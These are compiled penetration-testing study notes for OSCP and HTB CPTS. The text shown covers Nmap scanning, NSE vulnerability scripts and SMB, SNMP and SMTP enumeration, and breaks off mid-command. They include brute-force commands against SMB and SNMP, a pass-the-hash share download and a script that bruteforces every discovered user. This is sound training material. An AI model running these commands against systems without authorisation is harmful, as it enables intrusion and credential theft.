# Table of Contents - [Introduction | OSCP Notes](#introduction-oscp-notes) - [Introduction | Pentesting Notes](#introduction-pentesting-notes) - [Nmap Port Scanning | OSCP Notes](#nmap-port-scanning-oscp-notes) - [Nmap Scripts | OSCP Notes](#nmap-scripts-oscp-notes) - [SMB Enumeration (Port 139, 445) | OSCP Notes](#smb-enumeration-port-139-445-oscp-notes) - [SNMP Enumeraion (Port 161) | OSCP Notes](#snmp-enumeraion-port-161-oscp-notes) - [SMTP Enumeration (Port 25) | OSCP Notes](#smtp-enumeration-port-25-oscp-notes) - [NFS Enumeration (Port 111, 2049) | OSCP Notes](#nfs-enumeration-port-111-2049-oscp-notes) - [POP3 (Port 110, 25*) | OSCP Notes](#pop3-port-110-25-oscp-notes) - [MsSQL (Port 1433) | OSCP Notes](#mssql-port-1433-oscp-notes) - [MySQL (Port 3306) | OSCP Notes](#mysql-port-3306-oscp-notes) - [DNS Enumeration (Port 53) | OSCP Notes](#dns-enumeration-port-53-oscp-notes) - [Oracle (Port 1521) | OSCP Notes](#oracle-port-1521-oscp-notes) - [Directory Fuzzing | OSCP Notes](#directory-fuzzing-oscp-notes) - [Bruteforcing extensions | OSCP Notes](#bruteforcing-extensions-oscp-notes) - [CMS | OSCP Notes](#cms-oscp-notes) - [Bypass file upload filtering | OSCP Notes](#bypass-file-upload-filtering-oscp-notes) - [Web Scanning | OSCP Notes](#web-scanning-oscp-notes) - [File Upload | OSCP Notes](#file-upload-oscp-notes) - [WebDAV | OSCP Notes](#webdav-oscp-notes) - [Bruteforce Authentication | OSCP Notes](#bruteforce-authentication-oscp-notes) - [Post Requests | OSCP Notes](#post-requests-oscp-notes) - [LFI and RFI | OSCP Notes](#lfi-and-rfi-oscp-notes) - [Compiling the Exploit | OSCP Notes](#compiling-the-exploit-oscp-notes) - [ShellShock | OSCP Notes](#shellshock-oscp-notes) - [Null Byte Injection | OSCP Notes](#null-byte-injection-oscp-notes) - [PHP Wrappers | OSCP Notes](#php-wrappers-oscp-notes) - [msfvenom | OSCP Notes](#msfvenom-oscp-notes) - [Dumping the sam file | OSCP Notes](#dumping-the-sam-file-oscp-notes) - [Windows Exploit Suggester | OSCP Notes](#windows-exploit-suggester-oscp-notes) - [Interesting Files for LFI | OSCP Notes](#interesting-files-for-lfi-oscp-notes) - [Cracking Password | OSCP Notes](#cracking-password-oscp-notes) - [Upgrading shell | OSCP Notes](#upgrading-shell-oscp-notes) - [Searchsploit | OSCP Notes](#searchsploit-oscp-notes) - [Netcat | OSCP Notes](#netcat-oscp-notes) - [SUDO SU | OSCP Notes](#sudo-su-oscp-notes) - [Linux | OSCP Notes](#linux-oscp-notes) - [Custom Worldlist | OSCP Notes](#custom-worldlist-oscp-notes) - [Automated enumeration script | OSCP Notes](#automated-enumeration-script-oscp-notes) - [CheckList | OSCP Notes](#checklist-oscp-notes) - [Find Command Cheatsheet | OSCP Notes](#find-command-cheatsheet-oscp-notes) - [Bind and Reverse shell | OSCP Notes](#bind-and-reverse-shell-oscp-notes) - [Kernel Exploitation | OSCP Notes](#kernel-exploitation-oscp-notes) - [Windows | OSCP Notes](#windows-oscp-notes) - [SQL Injection Bypass | OSCP Notes](#sql-injection-bypass-oscp-notes) - [General | OSCP Notes](#general-oscp-notes) - [Linux post exploitation scripts | OSCP Notes](#linux-post-exploitation-scripts-oscp-notes) - [General | OSCP Notes](#general-oscp-notes) - [Brute-force service password | OSCP Notes](#brute-force-service-password-oscp-notes) - [Command injection Cheatsheet | OSCP Notes](#command-injection-cheatsheet-oscp-notes) - [XSS Payload | OSCP Notes](#xss-payload-oscp-notes) - [Linux Manual Exploitation | OSCP Notes](#linux-manual-exploitation-oscp-notes) - [Manual Exploitaion | OSCP Notes](#manual-exploitaion-oscp-notes) - [Introduction | HTB CPTS](#introduction-htb-cpts) - [Getting Started | HTB CPTS](#getting-started-htb-cpts) - [Nmap | HTB CPTS](#nmap-htb-cpts) - [Footprinting | HTB CPTS](#footprinting-htb-cpts) - [Services | HTB CPTS](#services-htb-cpts) - [File Transfer | HTB CPTS](#file-transfer-htb-cpts) - [Shells & Payloads | HTB CPTS](#shells-payloads-htb-cpts) - [Ligolo-ng | HTB CPTS](#ligolo-ng-htb-cpts) - [Metasploit | HTB CPTS](#metasploit-htb-cpts) - [Common Applications | HTB CPTS](#common-applications-htb-cpts) - [Information Gathering - web edition | HTB CPTS](#information-gathering-web-edition-htb-cpts) - [Pivoting | HTB CPTS](#pivoting-htb-cpts) - [Password Attacks | HTB CPTS](#password-attacks-htb-cpts) - [Login Bruteforcing | HTB CPTS](#login-bruteforcing-htb-cpts) - [Fuff | HTB CPTS](#fuff-htb-cpts) - [SQLMap | HTB CPTS](#sqlmap-htb-cpts) - [Web-Proxies | HTB CPTS](#web-proxies-htb-cpts) - [Linux Privesc | HTB CPTS](#linux-privesc-htb-cpts) - [SQL | HTB CPTS](#sql-htb-cpts) - [XSS | HTB CPTS](#xss-htb-cpts) - [Web Attacks | HTB CPTS](#web-attacks-htb-cpts) - [File Upload | HTB CPTS](#file-upload-htb-cpts) - [Window Privesc | HTB CPTS](#window-privesc-htb-cpts) - [Command Injection | HTB CPTS](#command-injection-htb-cpts) - [File Inclusion | HTB CPTS](#file-inclusion-htb-cpts) - [Active Directory | HTB CPTS](#active-directory-htb-cpts) - [Web-Proxies | HTB CPTS](#web-proxies-htb-cpts) --- # Introduction | OSCP Notes Wassup , This gitbook is tend to compile all resources I came through while preparing for my OSCP exam. I get these notes by compiling all the others notes I found in the internet wild. The notes are belonging to the author/owner. So, all credit are to the owners (too many to list) and feel free to share this notes! > Want To contact me ? > > Twitter - [https://twitter.com/Gabb4r](https://twitter.com/Gabb4r) > > Linkedin - [https://www.linkedin.com/in/gabb4r/](https://www.linkedin.com/in/gabb4r/) [NextNmap Port Scanning](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning) Last updated 4 years ago --- # Introduction | Pentesting Notes Wassup, This gitbook tends to compile all the resources I came through while preparing for my different exams. I get these notes by compiling all the other notes I found online. The notes are belonging to the author/owner. So, all credit is to the owners (too many to list) and feel free to share these notes! > Want To contact me ? > > Twitter - [https://twitter.com/Gabb4r](https://twitter.com/Gabb4r) > > Linkedin - [https://www.linkedin.com/in/gabb4r/](https://www.linkedin.com/in/gabb4r/) [](https://gabb4r.gitbook.io/pentesting-notes#oscp-notes) OSCP Notes ------------------------------------------------------------------------- [![Logo](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fspaces%252F-MkfTlo0T97eXbWuX_cT%252Favatar-1632817256001.png%3Fgeneration%3D1632817256210933%26alt%3Dmedia&width=48&height=48&sign=9ed8ef60&sv=2)Introduction | OSCP Notesgabb4r.gitbook.io](https://gabb4r.gitbook.io/oscp-notes) OSCP Notes [](https://gabb4r.gitbook.io/pentesting-notes#cpts-notes) CPTS Notes ------------------------------------------------------------------------- [![Logo](https://gabb4r.gitbook.io/htb-cpts/~gitbook/image?url=https%3A%2F%2F1478729845-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FS4gL5zrTUY3SIypqUrCl%252Ficon%252FfPnxoIlAqHpCkScG6E6D%252Fimage.png%3Falt%3Dmedia%26token%3D24d90f63-2465-4c87-bea4-b90535b0613d&width=48&height=48&sign=b727a388&sv=2)Introduction | HTB CPTSgabb4r.gitbook.io](https://gabb4r.gitbook.io/htb-cpts) CPTS Notes Last updated 1 year ago --- # Nmap Port Scanning | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-for-alive-hosts) Scan for alive hosts ---------------------------------------------------------------------------------------------------------- Copy $ nmap -sn $ip/24 $ nmap -vvv -sn $ip/24 If you want little faster Copy $ nmap -sn -n $ip/24 > ip-range.txt [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-specific-ip-range) Scan specific IP range -------------------------------------------------------------------------------------------------------------- Copy $ nmap -sP 10.0.0.0-100 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#auto-recon) Auto Recon -------------------------------------------------------------------------------------- Copy autorecon 10.10.10.3 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#initial-scan-tcp) Initial Scan TCP -------------------------------------------------------------------------------------------------- Copy nmap -sC -sV -O -oA initial 10.10.10.3Full Scan TCP [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#full-scan-tcp) Full Scan TCP -------------------------------------------------------------------------------------------- Comprehensive nmap scans in the background to make sure we cover all bases. Copy nmap -sC -sV -O -p- -oA nmap/full 10.10.10.3 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#full-scan-udp) Full Scan UDP -------------------------------------------------------------------------------------------- Copy nmap -sU -O -p- -oA nmap/udp 10.10.10.3 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#normal-scan) Normal Scan ---------------------------------------------------------------------------------------- Copy nmap -A $ip [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-specific-machine) Scan specific machine ------------------------------------------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-common-port) Scan common port Copy $ nmap -A -oA filename $ip/24 The command: * Scan 1024 most common ports * Run OS detection * Run default nmap scripts * Save the result into `.nmap`, `.gnmap` and `.xml` * Faster [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#fast-scanning) Fast scanning -------------------------------------------------------------------------------------------- Scan 100 most common ports Copy nmap -F $ip [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#quick-tcp-scan) Quick TCP Scan ---------------------------------------------------------------------------------------------- Copy nmap -sC -sV -vv -oA quick $ip [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#quick-udp-scan) Quick UDP Scan ---------------------------------------------------------------------------------------------- Copy nmap -sU -sV -vv -oA quick_udp $ip [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#full-tcp-scan) Full TCP Scan -------------------------------------------------------------------------------------------- Copy nmap -sC -sV -p- -vv -oA full 10.10.10.10 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#port-knock) Port knock -------------------------------------------------------------------------------------- Copy for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x $ip; done [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-deeply) Scan deeply ---------------------------------------------------------------------------------------- Scanning more deeply: Copy $ nmap -v -p- -sT $ip Example: $ nmap -v -p- -sT 10.0.1.0/24 This command: * Scan all 65535 ports with full connect scan * Take very long time * Print out straigt away instead of having to wait until end of the scan Tips: Scanning this takes a long time, suggest to leave the scan running overnight, when you're sleep or move on to different box in the meantime. [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#maximum-scan-delay) **Maximum scan delay** ---------------------------------------------------------------------------------------------------------- The –max-scan-delay is used to specify the maximum amount of time Nmap should wait between probes. Copy nmap -sC -sV $ip -oN initial -v --max-scan-delay=10 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#maximum-retries) **Maximum Retries** ---------------------------------------------------------------------------------------------------- –max-retries specifies the number of times a packet is to be resent on a port to check if it is open or closed. If –max-retries is set to 0, the packets will be sent only once on a port and no retries will be done. Copy nmap -p21-25$ip --max-retries 0 [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-for-specific-port) Scan for specific port -------------------------------------------------------------------------------------------------------------- Copy $ nmap -p T:80,443,8080 $ip/24 Use `-T`: specifies TCP ports. Use `-U`: for UDP ports. [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-for-unused-ip-addresses-and-store-in-text-file) Scan for unused IP addresses and store in text file ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Copy $ nmap -v -sn $ip/24 | grep down | awk '{print $5}' > filename.txt [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#other-option) Other option ------------------------------------------------------------------------------------------ Copy nmap -sV -sC -v -oA output $ip [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#udp-scan) UDP scan ---------------------------------------------------------------------------------- Scanning this might slow and unreliadble Copy $ nmap $ip -sU Example: $ nmap 10.11.1.X -sU [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#top-ports) Top ports ------------------------------------------------------------------------------------ To save time and network resources, we can also scan multiple IPs, probing for a short list of a an common ports. For example, let’s conduct a TCP connect scan for the top twenty TCP ports with kw Ma the `--top-ports` option and enable OS version detection, script scanning, and traceroute with -A: Copy nmap -sT -A --top-ports=20 10.11.1.1-254 -oG top-port-sweep.txt [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#scan-targets-from-a-text-file) Scan targets from a text file ---------------------------------------------------------------------------------------------------------------------------- Create a text file contains of our targets machine (like in method Scan for unused IP addresses and store in text file): Copy 192.168.1.144 192.168.1.179 192.168.1.182 Run this nmap command with `-iL` Copy nmap -iL list-of-ips.txt [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#onetwopunch.sh) Onetwopunch.sh ---------------------------------------------------------------------------------------------- Grab the latest bash script Copy git clone https://github.com/superkojiman/onetwopunch.git cd onetwopunch Create a text file contains of our targets machine (like in method Scan for unused IP addresses and store in text file): Copy 192.168.1.144 192.168.1.179 192.168.1.182 Then, run the script and tell it to read our txt file and perform TCP scan against each target. Copy ./onetwopunch.sh -t ip-range.txt -p tcp So, the idea behind the script to generate a scan of 65,535 ports on the targets. The script use unicornscan to scan all ports, and make a list of those ports that are open. The script then take the open ports and pass them to nmap for service detection. [](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning#autorecon) AutoRecon ------------------------------------------------------------------------------------ [GitHub - Tib3rius/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.](https://github.com/Tib3rius/AutoRecon) [PreviousIntroduction](https://gabb4r.gitbook.io/oscp-notes) [NextNmap Scripts](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts) Last updated 4 years ago --- # Nmap Scripts | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#find-scripts) Find Scripts ------------------------------------------------------------------------------------ Find script related to a service your interested in, example here is ftp Copy locate .nse | grep [port name] Example: locate .nse | grep ftp Copy ls /usr/share/nmap/scripts | grep smb Typically NSE scripts that scans for vulnerabilities are at Copy ls -l /usr/share/nmap/scripts/ * you can use this scripts with `--script=` , * it also support wildcard entries [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#help-manual-for-scripts) Help manual for scripts ---------------------------------------------------------------------------------------------------------- What does a script do? Copy nmap --script-help [script name] Example: nmap --script-help ftp-anon [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#vulnerability-scanning) Vulnerability Scanning -------------------------------------------------------------------------------------------------------- We can scan for vulnerability Scanning nmap scripts: Copy nmap --script vuln [ip target] [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#scan-with-all-scripts) Scan With All Scripts ------------------------------------------------------------------------------------------------------ Scan a target using all NSE scripts. May take an hour to complete. Copy nmap -p 80 --script=all [ip target] Copy nmap -p 80 --script=*vuln* [ip target] # Scan a target using all NSE vuln scripts. Copy nmap -p 80 --script=http*vuln* [ip target] # Scan a target using all HTTP vulns NSE scripts. [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#scan-with-particular-script) Scan with particular Script ------------------------------------------------------------------------------------------------------------------ Copy nmap -p 21 --script=ftp-anon [ip target]/24 # Scan entire network for FTP servers that allow anonymous access. [](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts#scan-entire-network-with-script) Scan entire network with script -------------------------------------------------------------------------------------------------------------------------- Copy nmap -p 80 --script=http-vuln-cve2010-2861 [ip target]/24 # Scan entire network for a directory traversal vulnerability. It can even retrieve admin's password hash. [PreviousNmap Port Scanning](https://gabb4r.gitbook.io/oscp-notes/nmap-port-scanning) [NextSMB Enumeration (Port 139, 445)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration) Last updated 4 years ago --- # SMB Enumeration (Port 139, 445) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#quick-intro) Quick Intro --------------------------------------------------------------------------------------------------------- * SMB stand for **Server Message Block** * SMB allows you to share your resources to other computers over the network, * There is 3 version of SMB, 1. **SMB1** version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version 2. **SMB2** reduced "chattiness" of SMB1. Guest access disabled by default 3. **SMB3** guest access disabled, uses encryption. Most secure. * **TCP port 139** is SMB over NetBios. * **TCP port 445** is SMB over Ip. This is newer version of SMB List of SMB versions and corresponding Windows versions: 1. SMB1 – Windows 2000, XP and Windows 2003. 2. SMB2 – Windows Vista SP1 and Windows 2008 3. SMB2.1 – Windows 7 and Windows 2008 R2 4. SMB3 – Windows 8 and Windows 2012. [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#nmap-scanning) Nmap Scanning ------------------------------------------------------------------------------------------------------------- Copy nmap -n -v -Pn -p139,445 -sV 192.168.0.101 # Getting version information Copy nmap 192.168.0.101 --script=smb-enum* nmap 192.168.0.101 --script=smb-vuln* nmap 192.1688.0.101 --script=smb-os* # Scan with NSE Scripts [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#list-available-shares) List Available Shares ----------------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#smbclient) smbclient Copy smbclient -L \\\\192.168.1.101\\ # Will list all shares smbclient -L \\$ip --option='client min protocol=NT1' # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED" smbclient //HOST/PATH -c 'recurse;ls' # List all files recursly ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#smbmap) smbmap Copy smbmap -H $ip # Will list all shares with available permissions smbmap -H $ip -R $sharename # Recursively list dirs, and files smbmap -u '' -p '' -H $ip smbmap -u guest -p '' -H $ip smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1 # With credentials ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#nmap) Nmap Copy nmap --script smb-enum-shares -p 139,445 $ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#connecting-to-shares) Connecting To Shares --------------------------------------------------------------------------------------------------------------------------- Copy smbclient \\\\192.168.1.101\\C$ or smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1' smbclient \\\\192.168.1.101\\admin$ -U t-skid # Connect with valid username and password # Specify username with -U [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#downloading-multi-files) Downloading multi files --------------------------------------------------------------------------------------------------------------------------------- Copy smb: \> RECURSE ON smb: \> PROMPT OFF smb: \> mget * # With smbclient smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q # Downloads a file in quiet mode smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#enum4linux) Enum4Linux ------------------------------------------------------------------------------------------------------- Copy enum4linux -a $ip enum4linux -u 'guest' -p '' -a $ip [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#null-session-with-rpcclient) Null session with rpcclient ----------------------------------------------------------------------------------------------------------------------------------------- Rpcclient is a Linux tool used for executing client-side MS-RPC functions. A null session is a connection with a samba or SMB server that does not require authentication with a password. Null sessions were enabled by default on legacy systems but have been disabled from Windows XP SP2 and Windows Server 2003. Nowadays it is not very common to encounter hosts that have null sessions enabled, but it is worth a try if you do stumble across one. The connection uses **port 445**. Copy rpcclient -U "" # You will be asked for a password but leave it blank and press enter to continue. Some important commands Copy rpcclient>srvinfo rpcclient>enumdomusers rpcclient>getdompwinfo [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#enumerating-users-with-ipcusd) Enumerating users with IPC$ ------------------------------------------------------------------------------------------------------------------------------------------- if IPC$ share is enabled , and have anonymous access we can enumerate users through **lookupsid.py** Copy lookupsid.py anonymous@10.10.215.206 [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#google-to-see-if-version-is-vulnerable) Google to see if version is vulnerable --------------------------------------------------------------------------------------------------------------------------------------------------------------- Copy SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#smbver.sh) smbver.sh ----------------------------------------------------------------------------------------------------- good script to use if none of scanner giving version for smb Copy #!/bin/sh #Author: rewardone #Description: # Requires root or enough permissions to use tcpdump # Will listen for the first 7 packets of a null login # and grab the SMB Version #Notes: # Will sometimes not capture or will print multiple # lines. May need to run a second time for success. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi if [ ! -z $2 ]; then rport=$2; else rport=139; fi tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null sleep 0.5 && echo "" You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , **Session Setup Andx Response** and there you will find smb version :) [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#smbenum.sh) smbenum.sh ------------------------------------------------------------------------------------------------------- Copy #!/bin/bash # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal # SECFORCE - Antonio Quina # All credits to Bernardo Damele A. G. for the ms08-067_check.py script IFACE="eth0" if [ $# -eq 0 ] then echo "Usage: $0 " echo "eg: $0 10.10.10.10" exit else IP="$1" fi echo -e "\n########## Getting Netbios name ##########" nbtscan -v -h $IP echo -e "\n########## Checking for NULL sessions ##########" output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"` echo $output echo -e "\n########## Enumerating domains ##########" bash -c "echo 'enumdomains' | rpcclient $IP -U%" echo -e "\n########## Enumerating password and lockout policies ##########" polenum $IP echo -e "\n########## Enumerating users ##########" nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP bash -c "echo 'enumdomusers' | rpcclient $IP -U%" bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt echo -e "\n########## Enumerating Administrators ##########" net rpc group members "Administrators" -I $IP -U% echo -e "\n########## Enumerating Domain Admins ##########" net rpc group members "Domain Admins" -I $IP -U% echo -e "\n########## Enumerating groups ##########" nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP echo -e "\n########## Enumerating shares ##########" nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 rm /tmp/$IP-users.txt [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration#brute-force-smb) Brute Force SMB ----------------------------------------------------------------------------------------------------------------- Copy hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv [PreviousNmap Scripts](https://gabb4r.gitbook.io/oscp-notes/nmap-scripts) [NextSNMP Enumeraion (Port 161)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion) Last updated 4 years ago --- # SNMP Enumeraion (Port 161) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#quick-intro) Quick Intro --------------------------------------------------------------------------------------------------------- * The Simple Network Management Protocol (SNMP) is a protocol **used in TCP/IP networks to collect and manage information about networked devices.** SNMP operates in the application layer (layer 7 of the OSI model) and uses **UDP port 161** to listen for requests. The SNMP protocol is supported by many types of devices including routers, switches, servers, printers, Network Attached Storage (NAS), firewalls, WLAN controllers and more. In the following sections we will be looking at the main components of SNMP managed networks, how they communicate with each other and something called the Management Information Base (MIB). We will also look at how and why SNMP can cause security issues and, of course, how to enumerate the SNMP protocol. **SNMP components -** SNMP managed networks have 3 components: 1. Managed Device A managed device (also referred to as a ‘node’) is a network device with the SNMP service enabled allowing unidirectional (read) or bidirectional (read/write) communication. Managed devices can be any networked device including servers, firewalls and routers. 2. Agent The agent is the software running on the managed device which is responsible for handling the communication. The agent translates device-specific configuration parameters into an SNMP format for the Network Management System. 3. Network Management System (NMS) The Network Management System is the software that is actually managing and monitoring networked devices. An SNMP managed network will always contain at least one NMS. **SNMP commands -** The SNMP protocol uses several commands which are sent from the NMS to the managed device’s agent and back. These commands can be categorized as read, write, trap and traversal commands. * Read commands are sent by the NMS to nodes for monitoring purposes. * Write commands are used to control the nodes in the network. * The trap commands are used for unsolicited SNMP messages from a device’s agent to the NMS to inform the NMS about certain events such as errors. * Traversal commands are used to check what information is retained on a managed device and to retrieve it. **SNMP Management Information Base (MIB) -** * The SNMP Management Information Base (MIB) is a database that contains information about the network device. When the Network Management System (NMS) sends a ‘get’ request for information about a managed device on the network, the agent service returns a structured table with data. This table is what is called the Management Information Base (MIB). MIB values are indexed using a series of numbers with dots. For example, MIB value 1.3.6.1.2.1.1.1 refers to the system description (sysDescr) and value 1.3.6.1.2.1.1.6 refers to the system location (sysLocation). **SNMP Community strings -** * The SNMP community string is like a username or password that allows access to the managed device. There are three different community strings that allow a user to set (1) read-only commands, (2) read and write commands and (3) traps. Most SNMPv1 and SNMPv2 devices ship from the factory with a default read-only community string set to **‘public’** and the read-write string set to ‘private’. As these default values are well-known and easy to guess, it is good security practice to replace all community strings with a value that is hard to guess. It is good practice to threat community strings as passwords. In SNMPv3, the community string was replaced by username and password authentication. [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#snmp-mib-trees) SNMP MIB Trees --------------------------------------------------------------------------------------------------------------- * 1.3.6.1.2.1.25.1.6.0 - System Processes * 1.3.6.1.2.1.25.4.2.1.2 - Running Programs * 1.3.6.1.2.1.25.4.2.1.4 - Processes Path * 1.3.6.1.2.1.25.2.3.1.4 - Storage Units * 1.3.6.1.2.1.25.6.3.1.2 - Software Name * 1.3.6.1.4.1.77.1.2.25 - User Accounts * 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#snmpwalk) SNMPwalk --------------------------------------------------------------------------------------------------- SNMPwalk is a great tool to query MIB values to retrieve information about managed devices, but, as a minimum, **it requires a valid SNMP read-only community string.** Copy for community in public private manager; do snmpwalk -c $community -v1 $ip; done # here it will take three comunity strings and check one by one snmpwalk -c public -v1 $ip snmpwalk -c public -v2c # here -c stands for community string and 2c is most common version found on today's snmp devices [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#snmpcheck) SNMPcheck ----------------------------------------------------------------------------------------------------- Same as `snmpwalk` but give nice output Copy snmpcheck -t 192.168.1.X -c public [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#brute-forcing-community-string) Brute forcing community string ----------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#onesixtyone) OneSixtyOne * Onesixtyone is a very fast tool to brute force SNMP community strings and take advantage of the connectionless protocol. Onesixtyone sends an SNMP request and (by default) waits 10 milliseconds for a response. If the community string sent by onesixtyone to the SNMP enabled device is invalid, then the request is dropped. However, if a valid community string is passed to an SNMP enabled device, the device responds with the information requested (the ‘system.sysDescr.0’ value). Copy onesixtyone -c dict.txt [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#wordlists) Wordlists ----------------------------------------------------------------------------------------------------- Copy /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#nse-script) NSE Script ------------------------------------------------------------------------------------------------------- Copy ls -l /usr/share/nmap/scripts/snmp* [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/snmp-enumeraion#snmpv3-enumeration) SNMPv3 Enumeration ----------------------------------------------------------------------------------------------------------------------- Copy wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb; ./snmpv3enum.rb [PreviousSMB Enumeration (Port 139, 445)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smb-enumeration) [NextNFS Enumeration (Port 111, 2049)](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/nfs-enumeration-port-111-2049) Last updated 4 years ago --- # SMTP Enumeration (Port 25) | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#quick-intro) Quick Intro ------------------------------------------------------------------------------------------------------------------ * Used to send, receive, and relay outgoing emails * Used port 25 * Main attacks are user enumeration and using an open relay to send spam [](https://gabb4r.gitbook.io/oscp-notes/service-enumeration/smtp-enumeration-port-25#nse) NSE -------------------------------------------------------------------------------------------------- Copy nmap 192.168.1.101 --script=smtp* -p 25 nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 